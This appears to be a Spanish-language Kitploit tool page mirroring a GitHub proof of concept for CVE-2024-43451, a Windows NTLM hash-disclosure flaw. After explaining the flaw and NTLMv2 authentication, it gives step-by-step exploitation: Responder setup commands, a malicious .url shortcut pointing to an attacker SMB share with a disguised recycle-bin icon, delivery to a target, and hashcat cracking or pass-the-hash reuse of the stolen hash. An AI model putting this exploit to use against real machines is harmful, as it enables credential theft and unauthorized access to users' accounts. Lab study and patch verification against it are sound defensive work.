Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-43451-POC — CVE-2024-43451 es una vulnerabilidad NTLM de Windows que permite a un atacante forzar la autenticación y capturar hashes NTLM mediante el uso de accesos directos maliciosos. | Kitploit
Herramientas/GitHubGitHub/ronf98/cve-2024-43451-poc
Descifrado de ContraseñasAnálisis de VulnerabilidadesExplotaciónPost-ExplotaciónPhishingAnálisis de Malware
GitHubronf98/cve-2024-43451-poc

CVE-2024-43451-POC

CVE-2024-43451 es una vulnerabilidad NTLM de Windows que permite a un atacante forzar la autenticación y capturar hashes NTLM mediante el uso de accesos directos maliciosos.

Ver Repositorio
1513hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Descripción

  • Nombre : CVE-2024-43451
  • Puntuación CVSSv3 : 6.5
  • Versiones afectadas : Todas las versiones de Microsoft Windows anteriores al parche de noviembre de 2024

CVE-2024-43451 es una vulnerabilidad de día cero en Microsoft Windows que permite a los atacantes capturar hashes de contraseñas NTLMv2 con una interacción mínima del usuario, lo que potencialmente conduce al robo de credenciales. Un método comúnmente explotado implica aprovechar la autenticación NTLM a través de conexiones SMB a un servidor remoto para capturar el hash. Esta vulnerabilidad fue parcheada en las actualizaciones de noviembre de 2024. Se recomienda a los usuarios aplicar las actualizaciones de seguridad correspondientes para mitigar el riesgo.

Este ataque fue descubierto siendo explotado activamente mediante un correo de phishing enviado desde un servidor gubernamental ucraniano comprometido. El correo incluye un archivo URL malicioso. Cuando el usuario interactúa con el archivo haciendo clic derecho, eliminándolo o moviéndolo, la vulnerabilidad se activa. Esto desencadena una conexión al servidor del atacante, lo que lleva a la descarga de más archivos maliciosos, como el malware SparkRAT (un troyano de acceso remoto de código abierto que permite al atacante obtener control del sistema de la víctima).

Autenticación NTLM

NTLMv2 es actualmente la versión más segura y la más relevante hoy en día.

  • El cliente se conecta al servidor y solicita acceso a un recurso.
  • El servidor genera un nonce (un desafío aleatorio de 16 bytes) y lo envía al cliente.
  • El cliente envía una respuesta generada mediante el algoritmo HMAC-MD5 que incluye el hash de la contraseña (usando el algoritmo hash NT), el nonce del servidor, la marca de tiempo, el nonce del cliente y más.
  • El servidor utiliza el hash NT y repite los mismos cálculos por sí mismo para producir su propia respuesta NTLM; una vez que cada uno tiene su propia respuesta, pueden compararlas.
  • Una vez comparadas, el servidor decide si aceptar o denegar la conexión.

imagen

Explotación

Configuración del POC

Para crear un entorno de trabajo para este POC, debemos configurar una máquina Windows objetivo con un número de compilación lanzado antes de noviembre de 2024, y un servidor remoto para simular la captura del hash:

  1. Descargar e instalar Responder para capturar el hash a través de SMB:
    root@kitploit:~
    brew install python3
    
    root@kitploit:~
    git clone https://github.com/lgandx/Responder.git
    
    root@kitploit:~
    cd Responder
    
    root@kitploit:~
    sudo python3 Responder.py -I <put your network interface> -v
    
  2. Asegúrese de que haya una conexión exitosa entre la máquina virtual Windows objetivo y su entorno "hacker" remoto.
  3. Pruebe la configuración de Responder yendo al explorador y escribiendo \\(IP del servidor remoto):

imagen

Creación del Exploit

Dado que todo lo que necesita el exploit es realizar una conexión SMB con el servidor remoto, podemos usar un archivo simple para simularlo:

  1. Abrir el Bloc de notas
  2. Ingrese lo siguiente:
    Puede ingresar cualquier icono que engañe al usuario para que interactúe, yo usé el icono de "papelera llena" (32)
    root@kitploit:~
    [InternetShortcut]
    URL=\\(remote server IP)\share
    IconIndex=32                    
    IconFile=C:\Windows\System32\shell32.dll
    
  3. Guárdelo como (nombre).url

Proceso Activo

Una vez que el archivo está preparado y entregado al sistema objetivo, robar el hash requiere una interacción mínima del usuario. Esta interacción podría implicar cualquiera de las siguientes acciones:

  • Descargar el archivo y acceder a la carpeta "Descargas"
  • Hacer clic derecho en el archivo
  • Mover el archivo a otra carpeta

https://github.com/user-attachments/assets/fd6389b5-4ee9-4d90-a76e-562394b24058

https://github.com/user-attachments/assets/b820ea73-b0fc-40f1-920e-28cf7869f1e2

Descifrado

Con el hash sin cifrar en mano, podemos intentar descifrarlo para revelar la contraseña en texto plano o usarlo en un ataque "Pass-the-Hash" con herramientas como Mimikatz o Metasploit.

En nuestro caso, un simple comando de Hashcat revela mi contraseña: hashcat -m 5600 leak.txt rockyou.txt

imagen

Descargar herramienta